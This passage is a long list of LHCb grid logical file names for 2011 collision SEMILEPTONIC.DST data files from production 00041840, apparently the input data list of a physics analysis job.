'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035999_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039377_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059804_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031251_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049207_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040535_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056507_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045065_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001534_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042173_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015951_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002903_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056033_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037059_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013452_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047526_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040402_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058835_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031851_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064321_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047886_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060564_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058832_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037980_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018228_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014599_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028661_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045339_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058433_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021711_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027401_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068073_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049443_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051353_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055430_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063909_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045852_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019259_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044083_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021162_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042747_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049394_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047521_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001381_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064195_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037537_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026877_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048520_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044078_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002048_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027659_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022403_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027723_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060827_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025895_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059523_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059930_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000598_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033977_1.semileptonic.dst',
